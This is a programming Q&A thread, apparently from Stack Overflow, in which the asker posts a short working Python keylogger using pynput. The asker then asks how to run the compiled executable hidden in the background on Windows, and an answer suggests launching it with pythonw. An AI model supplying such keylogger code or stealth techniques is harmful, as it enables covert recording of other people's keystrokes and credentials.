# How to run a python script executable in the background

Tags: python, python-3.x

I am running python 3.6 and i made a keylogger to test on my VM. I converted the keylogger to an executable using pyinstaller. The keylogger works great but, when i run it, it opens a black window and when i close it, it stops the program. I want to have it so I can run the executable in the background.

EDIT: I am using Windows 10

```
from pynput.keyboard import Key, Listener
import logging

log_dir = ''

logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, 
format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

Comment: Can you tell us which OS you are using? On most OSes there is a way to start something on boot as a service... Also, if the code is not too long you maybe could post it or let us know what libs are being used (any UI?)

Comment: Just edited my post

Comment: you could use the `threading` module

Answer (score 0):

If you don't want any console window to appar under windows. Do `start` On windows, execute it with `pythonw`. The hotkey is `Windows + r`

```
pythonw C:\Users\yourUser\Desktop\hidden.py
```

[image]

Comment: Cant do that because thats running the python file, and hypothetically speaking if I wanted to run this on a computer without python, i would need it to be an executable and you cant run that command if its an executable.